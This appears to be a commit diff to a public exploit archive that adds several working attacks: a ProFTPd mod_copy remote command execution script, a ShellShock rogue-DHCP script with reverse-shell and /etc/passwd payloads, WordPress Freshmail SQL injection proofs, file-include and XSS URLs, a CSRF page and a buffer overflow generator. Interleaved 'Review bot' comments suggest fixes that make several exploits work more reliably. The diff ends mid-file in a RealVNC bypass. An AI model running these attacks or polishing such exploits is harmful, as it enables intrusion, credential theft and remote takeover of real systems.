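--- a/platforms/linux/remote/36803.py
+++ b/platforms/linux/remote/36803.py
@@ -0,0 +1,47 @@
+# Title: ProFTPd 1.3.5 Remote Command Execution
+# Date : 20/04/2015
+# Author: R-73eN
+# Software: ProFTPd 1.3.5 with mod_copy
+# Tested : Kali Linux 1.06
+# CVE : 2015-3306
+# Greetz to Vadim Melihow for all the hard work .
+import socket
+import sys
+import requests
+#Banner
+banner = ""
+banner += " ___ __ ____ _ _ \n"
+banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
+banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
+banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
+banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
+print banner
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+if(len(sys.argv) < 4):
+    print '\n Usage : exploit.py server directory cmd'
+else:
+    server = sys.argv[1] #Vulnerable Server
+    directory = sys.argv[2] # Path accessible from web .....
+    cmd = sys.argv[3] #PHP payload to be executed
+    evil = '<?php system("' + cmd + '") ?>'
+    s.connect((server, 21))
+    s.recv(1024)
+    print '[ + ] Connected to server [ + ] \n'
+    s.send('site cpfr /etc/passwd')
+    s.recv(1024)
+    s.send('site cpto ' + evil)
+    s.recv(1024)
+    s.send('site cpfr /proc/self/fd/3')
+    s.recv(1024)
+    s.send('site cpto ' + directory + 'infogen.php')
+    s.recv(1024)
+    s.close()
+    print '[ + ] Payload sended [ + ]\n'
+    print '[ + ] Executing Payload [ + ]\n'
+    r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP
+    if (r.status_code == 200):
+        print '[ * ] Payload Executed Succesfully [ * ]'
+    else:
+        print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'
+
+print '\n http://infogen.al/'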
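Review bot: `s.send('site cpto ' + directory + 'infogen.php')` joins the two halves with no separator, so a `directory` argument given without a trailing slash names a different file, while `requests.get('http://' + server + '/infogen.php')` ignores `directory` altogether and assumes the file landed in the web root; both should be derived from one value, e.g. `target = directory.rstrip('/') + '/infogen.php'`. The FTP commands are written with `s.send` and no `\r\n` line terminator, so correct delivery depends on each call becoming its own segment and on the server accepting an unterminated line; `s.sendall(line + '\r\n')` is the protocol-correct form. The `print` statements are Python 2 syntax and `requests` is an undeclared third-party dependency, both of which the header comments should state.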
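--- a/platforms/linux/remote/36933.py
+++ b/platforms/linux/remote/36933.py
@@ -0,0 +1,97 @@
+#!/usr/bin/python
+# Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC
+# Date: 2014-09-29
+# Author: @fdiskyou
+# e-mail: rui at deniable.org
+# Version: 4.1
+# Tested on: Debian, Ubuntu, Kali
+# CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
+from scapy.all import *
+
+conf.checkIPaddr = False
+fam,hw = get_if_raw_hwaddr(conf.iface)
+victim_assign_ip = "10.0.1.100"
+server_ip = "10.0.1.2"
+gateway_ip = "10.0.1.2"
+subnet_mask = "255.255.255.0"
+dns_ip = "8.8.8.8"
+spoofed_mac = "00:50:56:c0:00:01"
+payload = "() { ignored;}; echo 'moo'"
+payload_2 = "() { ignored;}; /bin/nc -e /bin/bash localhost 7777"
+payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/10.0.1.1/4444 0>&1 &"
+payload_4 = "() { ignored;}; /bin/cat /etc/passwd"
+payload_5 = "() { ignored;}; /usr/bin/wget http://google.com"
+rce = payload_5
+
+def toMAC(strMac):
+    cmList = strMac.split(":")
+    hCMList = []
+    for iter1 in cmList:
+        hCMList.append(int(iter1, 16))
+    hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5])
+    return hMAC
+
+def detect_dhcp(pkt):
+    # print 'Process ', ls(pkt)
+    if DHCP in pkt:
+        # if DHCP Discover then DHCP Offer
+        if pkt[DHCP].options[0][1]==1:
+            clientMAC = pkt[Ether].src
+            print "DHCP Discover packet detected from " + clientMAC
+
+            sendp(
+                Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
+                IP(src=server_ip,dst="255.255.255.255")/
+                UDP(sport=67,dport=68)/
+                BOOTP(
+                    op=2,
+                    yiaddr=victim_assign_ip,
+                    siaddr=server_ip,
+                    giaddr=gateway_ip,
+                    chaddr=toMAC(clientMAC),
+                    xid=pkt[BOOTP].xid,
+                    sname=server_ip
+                )/
+                DHCP(options=[('message-type','offer')])/
+                DHCP(options=[('subnet_mask',subnet_mask)])/
+                DHCP(options=[('name_server',dns_ip)])/
+                DHCP(options=[('lease_time',43200)])/
+                DHCP(options=[('router',gateway_ip)])/
+                DHCP(options=[('dump_path',rce)])/
+                DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
+            )
+            print "DHCP Offer packet sent"
+
+        # if DHCP Request than DHCP ACK
+        if pkt[DHCP] and pkt[DHCP].options[0][1] == 3:
+            clientMAC = pkt[Ether].src
+            print "DHCP Request packet detected from " + clientMAC
+
+            sendp(
+                Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
+                IP(src=server_ip,dst="255.255.255.255")/
+                UDP(sport=67,dport=68)/
+                BOOTP(
+                    op=2,
+                    yiaddr=victim_assign_ip,
+                    siaddr=server_ip,
+                    giaddr=gateway_ip,
+                    chaddr=toMAC(clientMAC),
+                    xid=pkt[BOOTP].xid
+                )/
+                DHCP(options=[('message-type','ack')])/
+                DHCP(options=[('subnet_mask',subnet_mask)])/
+                DHCP(options=[('lease_time',43200)])/
+                DHCP(options=[('router',gateway_ip)])/
+                DHCP(options=[('name_server',dns_ip)])/
+                DHCP(options=[('dump_path',rce)])/
+                DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
+            )
+            print "DHCP Ack packet sent"
+
+def main():
+    #sniff DHCP requests
+    sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface="vmnet1")
+
+if __name__ == '__main__':
+    sys.exit(main())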
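Review bot: `sys.exit(main())` and the `struct.pack` calls in `toMAC` rely on `sys` and `struct` being re-exported by `from scapy.all import *`; neither module is imported explicitly, so the script runs only as a side effect of the star import and should carry `import struct` and `import sys` of its own. The interface handling is also inconsistent: `fam,hw = get_if_raw_hwaddr(conf.iface)` reads the configured interface and its result is never used, while the two `sendp` calls and `sniff` hard-code `iface="vmnet1"`; one `IFACE` constant used in all four places keeps the configuration in a single spot. `toMAC` reduces to `return struct.pack('!6B', *[int(o, 16) for o in strMac.split(':')])`, and `pkt[DHCP].options[0][1]==1` presumably assumes message-type is the first DHCP option, which deserves a comment such as `# assumes message-type is options[0] — option order is not guaranteed` since the same assumption appears in the Request branch.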
88
platforms/multiple/webapps/36930.txt
|
@ -0,0 +1,88 @@
|
|||
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
|
||||
# Google Dork: N/A
|
||||
# Date: 05/05/2015
|
||||
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
|
||||
# Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/>
|
||||
# Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6
|
||||
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
|
||||
# CVE : N/A
|
||||
# Category: webapps
|
||||
|
||||
1. Summary
|
||||
------------------
|
||||
|
||||
Freshmail plugin is an email marketing plugin for wordpress, allowing the
|
||||
administrator to create mail campaigns and keep track of them.
|
||||
|
||||
There is a unauthenticated SQL injection vulnerability in the "Subscribe to
|
||||
our newsletter" formularies showed to the web visitors in the POST
|
||||
parameter *fm_form_id. *
|
||||
|
||||
2. Vulnerability timeline
|
||||
----------------------------------
|
||||
|
||||
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
|
||||
by twitter.
|
||||
- 05/05/2015: Send the details by mail to developer.
|
||||
|
||||
- 05/05/2015: Response from the developer.
|
||||
- 06/05/2015: Fixed version in 1.6
|
||||
|
||||
3. Vulnerable code
|
||||
---------------------------
|
||||
|
||||
Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50
|
||||
|
||||
[...]
|
||||
Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
|
||||
Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
|
||||
[...]
|
||||
Line 44: $result =3D $_POST;
|
||||
[...]
|
||||
Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms
|
||||
where form_id=3D"'.*$result['fm_form_id']*.'";');
|
||||
[...]
|
||||
|
||||
3. Proof of concept
|
||||
---------------------------
|
||||
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: <web>
|
||||
X-Requested-With: XMLHttpRequest
|
||||
[...]
|
||||
Cookie: wordpress_f30[...]
|
||||
|
||||
form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and
|
||||
"a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F
|
||||
|
||||
4. Explanation
|
||||
---------------------
|
||||
|
||||
A page visitor can submit an email (fake@fake.com) to subscribe to the
|
||||
formulary with fm_form_id=3D"1" and the JSON message received will be simil=
|
||||
ar
|
||||
to:
|
||||
|
||||
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
|
||||
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
|
||||
uccess","message":"*Your
|
||||
sign up request was successful! Please check your email inbox.*"}
|
||||
|
||||
The second time he tries to do the same with the same email the message
|
||||
returned will be:
|
||||
|
||||
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
|
||||
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
|
||||
uccess","message":"*Given
|
||||
email address is already subscribed, thank you!*"}
|
||||
|
||||
If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa=
|
||||
me
|
||||
message indicating that the Given email is already subscribed indicating
|
||||
that the first character of the username is an "a" or a null message
|
||||
indicating that the username first character is not an "a".
|
||||
|
||||
5. Solution
|
||||
---------------
|
||||
|
||||
Update to version 1.6
|
|
@ -1,7 +1,7 @@
|
|||
# Exploit Title: KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability
|
||||
# Date: 2010-08-11
|
||||
# Author: fdisk (@fdiskyou)
|
||||
# e-mail: fdiskyou at deniable.org
|
||||
# Author: @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# Software Link: http://www.knowledgetree.com/products/community/download
|
||||
# Version: 3.5.2
|
||||
# Notes: Fixed in the last version.
|
||||
|
|
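--- a/platforms/php/webapps/36926.txt
+++ b/platforms/php/webapps/36926.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52347/info
+
+LeKommerce is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/path/secc.php?id={sqli}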
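--- a/platforms/php/webapps/36927.txt
+++ b/platforms/php/webapps/36927.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/52350/info
+
+ToendaCMS is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+ToendaCMS 1.6.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/setup/index.php?site=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/s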
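--- a/platforms/php/webapps/36937.html
+++ b/platforms/php/webapps/36937.html
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/52377/info
+
+phpMyVisites is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+phpMyVisites 2.4 is vulnerable; other versions may also be affected.
+
+<html>
+<head>
+<title>Warning! This is Proof Of Concept Exploit for phpMyVisites 2.4 (version.php 238 2009-12-16 19:48:15Z matthieu_ $)</title>
+</head>
+<h1> Warning! This is a Proof Of Concept Exploit for phpMyVisites 2.4:<br/></h1>
+<p>// $Id: version.php 238 2009-12-16 19:48:15Z matthieu_ $
+PHPMV_VERSION 2.4
+</p>
+</h1>
+<body onload="javascript:document.forms[0].submit()">
+
+<form action="http://CHANGE_TO_RTARGET/phpmv2/index.php?mod=install_database_setup" method="post" name="form_phpmv" id="form_phpmv">
+<input value="<script>alert(document.cookie);</script>" name="form_dblogin" type="hidden" />
+<input value="<script>alert(document.cookie);</script>" name="form_dbpassword" type="hidden" />
+<input value="<script>alert(document.cookie);</script>" name="form_dbhost" type="hidden" />
+<input value="<script>alert(document.cookie);</script>" name="form_dbname" type="hidden" />
+<input value="<script>alert(document.cookie);</script>" name="form_dbprefix" type="hidden"/></td>
+
+<!--- Author: AkaStep -->
+</form>
+</body>
+</html>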
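Review bot: The markup is not well-formed: the `</h1>` on the line after `</p>` closes a heading that was already closed one line earlier, the `</td>` trailing the last `<input>` has no enclosing table, and `<body onload=...>` opens after the `<h1>` and `<p>` content instead of before it. Browsers recover from all three, but the file is clearer to read and validate if `<body>` directly follows `</head>` and the two stray closing tags are dropped.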
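--- a/platforms/php/webapps/36938.txt
+++ b/platforms/php/webapps/36938.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52399/info
+
+singapore is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+singapore 0.10.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/patch/index.php?gallery=<script>alert('31337')</script>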
215
platforms/php/webapps/36942.txt
|
@ -0,0 +1,215 @@
|
|||
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
|
||||
# Google Dork: N/A
|
||||
# Date: 05/05/2015
|
||||
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
|
||||
# Vendor Homepage:
|
||||
*http://freshmail.com/ <http://freshmail.com/> *
|
||||
# Software Link:
|
||||
*https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
|
||||
<https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>*
|
||||
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
|
||||
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
|
||||
2.4.0 (Ubuntu)
|
||||
# CVE : N/A
|
||||
# Category: webapps
|
||||
|
||||
1. Summary
|
||||
------------------
|
||||
|
||||
Freshmail plugin is an email marketing plugin for wordpress, allowing the
|
||||
administrator to create mail campaigns and keep track of them.
|
||||
|
||||
There is a SQL Injection vulnerability available for collaborators (or
|
||||
higher privileged users) for webs with freshmail plugin installed. The SQL
|
||||
Injection in located in the attribute "id" of the inserted shortcode
|
||||
[FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before
|
||||
inserting it in a SQL query.
|
||||
|
||||
A collaborator can insert shortcodes when he/she is editing a new post or
|
||||
page and can preview the results (no administrator approval needed),
|
||||
launching this SQL Injection.
|
||||
|
||||
|
||||
2. Vulnerability timeline
|
||||
----------------------------------
|
||||
|
||||
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
|
||||
by twitter.
|
||||
- 05/05/2015: Send the details by mail to developer.
|
||||
|
||||
- 05/05/2015: Response from the developer.
|
||||
- 06/05/2015: Fixed version in 1.6
|
||||
|
||||
3. Vulnerable code
|
||||
---------------------------
|
||||
|
||||
Vulnerable File: include/shortcode.php, lines 27 and 120:
|
||||
|
||||
Line 19: function fm_form_func($atts)
|
||||
[...]
|
||||
Line 27: $form_value = $wpdb->get_row("select * from
|
||||
".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";');
|
||||
[...]
|
||||
Line 120: add_shortcode('FM_form', 'fm_form_func');
|
||||
|
||||
|
||||
3. Proof of concept
|
||||
---------------------------
|
||||
|
||||
1. As collaborator, start a new post.
|
||||
2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b']
|
||||
3. Click preview.
|
||||
4. If the form is shown, the statement is true, if not, false.
|
||||
|
||||
POST /wp-admin/post.php HTTP/1.1
|
||||
Host: <web>
|
||||
Content-Length: 3979
|
||||
Accept:
|
||||
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Origin: <web>
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36
|
||||
(KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36
|
||||
Content-Type: multipart/form-data;
|
||||
boundary=----WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.8,es;q=0.6
|
||||
Cookie: wordpress_f305[...]
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="_wpnonce"
|
||||
|
||||
0a75a3666b
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="_wp_http_referer"
|
||||
|
||||
/wp-admin/post.php?post=69&action=edit&message=8
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="user_ID"
|
||||
|
||||
4
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="action"
|
||||
|
||||
editpost
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="originalaction"
|
||||
|
||||
editpost
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="post_author"
|
||||
|
||||
4
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="post_type"
|
||||
|
||||
post
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="original_post_status"
|
||||
|
||||
pending
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="referredby"
|
||||
|
||||
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="_wp_original_http_referer"
|
||||
|
||||
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="post_ID"
|
||||
|
||||
69
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="meta-box-order-nonce"
|
||||
|
||||
f8aa04e508
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="closedpostboxesnonce"
|
||||
|
||||
ebf65a43ed
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="post_title"
|
||||
|
||||
Testing SQLi in shortcode
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="samplepermalinknonce"
|
||||
|
||||
e753a2d8f2
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="content"
|
||||
|
||||
[FM_form id='1" and substr(user(),1,1)="b]
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="wp-preview"
|
||||
|
||||
dopreview
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="original_publish"
|
||||
|
||||
Submit for Review
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="post_format"
|
||||
|
||||
0
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="post_category[]"
|
||||
|
||||
0
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="post_category[]"
|
||||
|
||||
1
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="tax_input[post_tag]"
|
||||
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="newtag[post_tag]"
|
||||
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="excerpt"
|
||||
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="trackback_url"
|
||||
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="metakeyselect"
|
||||
|
||||
#NONE#
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="metakeyinput"
|
||||
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="metavalue"
|
||||
|
||||
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="_ajax_nonce-add-meta"
|
||||
|
||||
6a13a5a808
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="advanced_view"
|
||||
|
||||
1
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="comment_status"
|
||||
|
||||
open
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL
|
||||
Content-Disposition: form-data; name="ping_status"
|
||||
|
||||
open
|
||||
------WebKitFormBoundary384PE6lRgBcOibkL--
|
||||
|
||||
|
||||
5. Solution
|
||||
---------------
|
||||
|
||||
Update to version 1.6
|
|
@ -1,7 +1,7 @@
|
|||
# Exploit Title: Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC
|
||||
# Date: 2010-08-14
|
||||
# Author: fdisk (@fdiskyou)
|
||||
# e-mail: fdiskyou at deniable.org
|
||||
# Author: @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# Version: 2.6
|
||||
# Tested on: Windows 2003 Server SP1 en
|
||||
# CVE: CVE-2007-3336 - CVE-2007-3338
|
||||
|
|
|
@ -1,8 +1,8 @@
|
|||
#!/usr/bin/python
|
||||
# Exploit Title: WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)
|
||||
# Date: 2010-07-28
|
||||
# Author: fdisk (@fdiskyou)
|
||||
# e-mail: fdiskyou at deniable.org
|
||||
# Author: @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# Version: 3.1.2.2 2010.04.15
|
||||
# Tested on Windows XP SP3 en
|
||||
|
||||
|
|
|
@ -3,8 +3,8 @@
|
|||
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (SEH)
|
||||
# WINDOWS XP SP3 EN Fully Patched
|
||||
# Bug found by http://www.exploit-db.com/exploits/15248/
|
||||
# POC and Exploit by fdisk (@fdiskyou)
|
||||
# e-mail: fdiskyou at deniable.org
|
||||
# POC and Exploit by @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# This POC was already been released here (without proper shellcode): http://www.exploit-db.com/winamp-5-58-from-dos-to-code-execution/
|
||||
# We later gave up on SEH and went straight for direct EIP overwrite, yesterday I couldn't sleep and decided to finish cooking this version.
|
||||
# Further References:
|
||||
|
|
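--- a/platforms/windows/local/36928.py
+++ b/platforms/windows/local/36928.py
@@ -0,0 +1,75 @@
+source: http://www.securityfocus.com/bid/52351/info
+
+Macro Toolworks is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+Local attackers can exploit this issue to run arbitrary code with elevated privileges. Failed exploit attempts can result in a denial-of-service condition.
+
+Macro Toolworks 7.5.0 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/python
+
+# Exploit Title: Pitrinec Software Macro Toolworks Free/Standard/Pro v7.5.0 Local Buffer Overflow
+# Version: 7.5.0
+# Date: 2012-03-04
+# Author: Julien Ahrens
+# Homepage: http://www.inshell.net
+# Software Link: http://www.macrotoolworks.com
+# Tested on: Windows XP SP3 Professional German / Windows 7 SP1 Home Premium German
+# Notes: Overflow occurs in _prog.exe, vulnerable are all Pitrinec applications on the same way.
+# Howto: Copy options.ini to App-Dir --> Launch
+
+# 646D36: The instruction at 0x646D36 referenced memory at 0x42424242. The memory could not be read -> 42424242
+(exc.code c0000005, tid 3128)
+
+# Registers:
+# EAX 0120EA00 Stack[000004C8]:0120EA00
+# EBX FFFFFFFF
+# ECX 42424242
+# EDX 00000002
+# ESI 007F6348 _prog.exe:007F6348
+# EDI 007F6348 _prog.exe:007F6348
+# EBP 0120EA0C Stack[000004C8]:0120EA0C
+# ESP 0120E9E8 Stack[000004C8]:0120E9E8
+# EIP 00646D36 _prog.exe:00646D36
+# EFL 00200206
+
+# Stack:
+# 0120E9E0 0012DF3C
+# 0120E9E4 00000000
+# 0120E9E8 0205A5A0 debug045:0205A5A0
+# 0120E9EC 1B879EF8
+# 0120E9F0 007F6348 _prog.exe:007F6348
+# 0120E9F4 007F6348 _prog.exe:007F6348
+
+# Crash:
+# _prog.exe:00646D36 ; ---------------------------------------------------------------------------
+# _prog.exe:00646D36 mov eax, [ecx]
+# _prog.exe:00646D38 call dword ptr [eax+0Ch]
+# _prog.exe:00646D3B call near ptr unk_6750D0
+# _prog.exe:00646D40 retn 4
+# _prog.exe:00646D40 ; ---------------------------------------------------------------------------
+
+# Dump:
+# 007F6380 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+# 007F6390 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+# 007F63A0 42 42 42 42 43 43 43 43 43 43 43 43 43 43 43 43 BBBBCCCCCCCCCCCC
+# 007F63B0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
+# 007F63C0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
+
+file="options.ini"
+
+junk1="\x41" * 744
+boom="\x42\x42\x42\x42"
+junk2="\x43" * 100
+
+poc="[last]\n"
+poc=poc + "file=" + junk1 + boom + junk2
+
+try:
+    print "[*] Creating exploit file...\n"
+    writeFile = open (file, "w")
+    writeFile.write( poc )
+    writeFile.close()
+    print "[*] File successfully created!"
+except:
+    print "[!] Error while creating file!"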
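Review bot: The file is committed as a `.py` but opens with unquoted advisory prose (`source: ...` through `Macro Toolworks 7.5.0 is vulnerable; ...`) ahead of the `#!/usr/bin/python` line, and the crash note continues on an unprefixed `(exc.code c0000005, tid 3128)` line, so the script fails to parse before any of it runs; prefixing those lines with `#` or moving the advisory text into a module docstring fixes both. The bare `except:` also hides the real `IOError` and would swallow `KeyboardInterrupt`; `except IOError as e:` with `e` included in the printed message is the narrow form. `file` shadows the builtin, and `with open(file, "w") as writeFile:` would replace the manual open/write/close so the handle is released even when `write` raises.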
|
@ -1,7 +1,7 @@
|
|||
# Exploit Title: Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)
|
||||
# Date: 2010-07-18
|
||||
# Author: fdisk (@fdiskyou)
|
||||
# e-mail: fdiskyou at deniable.org
|
||||
# Author: @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# Software Link:
|
||||
# Version: 1.7.0.11
|
||||
# Tested on: Windows XP SP3 en
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability PoC (ZDI-11-055)
|
||||
# Date: 2011-05-28
|
||||
# Author: fdisk (@fdiskyou)
|
||||
# e-mail: fdiskyou at deniable.org
|
||||
# Author: @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# Version: 6.11
|
||||
# Tested on: Windows 2003 Server SP2 en
|
||||
# CVE: CVE-2011-0923
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Exploit Title: HP Data Protector Cliet EXEC_SETUP Remote Code Execution Vulnerability PoC (ZDI-11-056)
|
||||
# Date: 2011-05-29
|
||||
# Author: fdisk (@fdiskyou)
|
||||
# e-mail: fdiskyou at deniable.org
|
||||
# Author: @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# Version: 6.11
|
||||
# Tested on: Windows 2003 Server SP2 en
|
||||
# CVE: CVE-2011-0922
|
||||
|
|
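--- a/platforms/windows/remote/36932.py
+++ b/platforms/windows/remote/36932.py
@@ -0,0 +1,95 @@
+# Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit
+# Date: 2012-05-13
+# Author: @fdiskyou
+# e-mail: rui at deniable.org
+# Version: 4.1.0 and 4.1.1
+# Tested on: Windows XP
+# CVE: CVE-2006-2369
+# Requires vncviewer installed
+# Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use)
+import select
+import thread
+import os
+import socket
+import sys, re
+
+BIND_ADDR = '127.0.0.1'
+BIND_PORT = 4444
+
+def pwn4ge(host, port):
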